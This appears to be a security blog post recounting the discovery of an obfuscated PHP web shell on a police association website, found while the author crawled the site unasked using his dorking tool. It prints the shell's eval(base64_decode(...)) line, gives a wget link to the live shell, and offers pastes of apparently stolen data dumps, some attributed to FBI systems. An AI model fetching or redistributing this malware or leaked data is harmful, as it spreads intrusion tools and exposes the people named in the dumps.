Digital Message In a Bottle?

Foreword.

As a programmer I try to automate most repetitive tasks, if there's something I have to do often I usually opt to write a quick script to get the job done in a more timely manner. This includes automating security related jobs when possible. With that in mind, I wrote a tool a while ago called DorkNet that, as the name may suggest, helps with Google Dorking. Since it takes in a list of dorks and appends the results to a text file it's a fast and easy way of cataloguing a lot of websites in a relatively short amount of time based on the criteria(Dorks) you have provided.

If you are interested in this program please feel free to download, or clone it directly from my repo at Github.

git clone https://github.com/NullArray/DorkNet.git

A small investigation.

As I was going over the latest batch of search results I noticed I had an entry for the website of the Saskatchewan Association of Chiefs of Police. Now, being related to law enforcement I imagined the web application would be pretty secure but since I had my intercepting proxy on anyway I figured I would just crawl it, look at some of the responses etcetera and see if I could find anything interesting regardless. Without being too intrusive or disruptive.

At some point I came across a page that would not render in browser but had large response body. Inspecting the source code revealed the presence of a variable which had been assigned the value of a very long base64 encoded string and ended in:

;eval(base64_decode($QBDB51E25BF9A7F3D2475072803D1C36D));?>

Indicating that the string was encoded PHP, to be decoded and executed. My first thought was that we were dealing with a PHP shell and after decoding the string it became apparent that we were.

Left decoded base64, right original.

Note the URL that's commented into the original source file. Following it we end up on a little website that has a bunch of shells which one may download and use at leisure, it would appear. In the decoded payload there is another set of URLs, presumably linking to the websites of the original authors of it.

If you're interested in looking at the source code for yourself feel free to 'wget' it from here:

https://www.sacp.ca/news/download_attachment.php?id=16

The plot thickens.

The actor(s) were successful in exploiting their target. Interestingly enough, they left a data dump behind on the server. As far as I am able to tell this data originated from three separate sources possibly unrelated to the main target(SACP Server). Most notably there's one originating from what appears to be compromised FBI systems. Secondly there is a data dump from what appears to be dukecorperation.com, and lastly an unnamed dump that could be related to the SACP server.

Attribution.

Throughout the text in the data dump there's numerous references to AntiSec, and LulzSec which are loosely affiliated with the Anonymous hacktivist collective. The actor(s) clearly also directly address the FBI on a number of occasions throughout the dump. It would appear to me that this operation was intended to send a message to the FBI.

A Digital Message in a Bottle.

In closing.

If you're interested I have collected the data and separated it into three separate pastes according to their presumed origins.

Data Dump #1(FBI)

Data Dump #2(Duke Corp)

Data Dump #3(Potentially SACP)

The complete file can be found right on the SACP server as well by clicking here.

Please note: All references to AntiSec, are unrelated to @AntiSec_Inc, NullArray, and the Vector pseudonym.
Like what you read? Give Vector a round of applause.

From a quick cheer to a standing ovation, clap to show how much you enjoyed this story.